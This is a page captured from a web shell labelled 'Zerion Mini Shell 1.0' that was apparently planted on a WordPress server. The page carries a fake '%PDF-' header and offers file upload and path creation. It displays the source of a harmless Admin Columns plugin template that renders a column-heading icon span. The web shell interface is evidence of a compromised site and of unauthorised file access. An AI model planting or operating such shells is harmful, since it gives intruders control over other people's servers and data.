%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/cwg/wp-content/plugins/codepress-admin-columns/templates/settings/
Upload File :
Create Path :
Current File : //var/www/cwg/wp-content/plugins/codepress-admin-columns/templates/settings/header-icon.php

<?php

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

$classes = [
	'ac-column-heading-setting',
	'ac-column-indicator--' . $this->setting,
	'ac-column-indicator',
];

if ( $this->dashicon ) {
	$classes[] = 'dashicons';
	$classes[] = $this->dashicon;
}

if ( $this->class ) {
	$classes[] = $this->class;
}

if ( 'on' === $this->state ) {
	$classes[] = 'on';
}

?>
<span class="<?php echo esc_attr( implode( ' ', $classes ) ); ?>"
		title="<?php echo esc_attr( $this->title ); ?>"
		data-setting="<?php echo esc_attr( $this->setting ); ?>"
		data-indicator-toggle=""
>
</span>

Zerion Mini Shell 1.0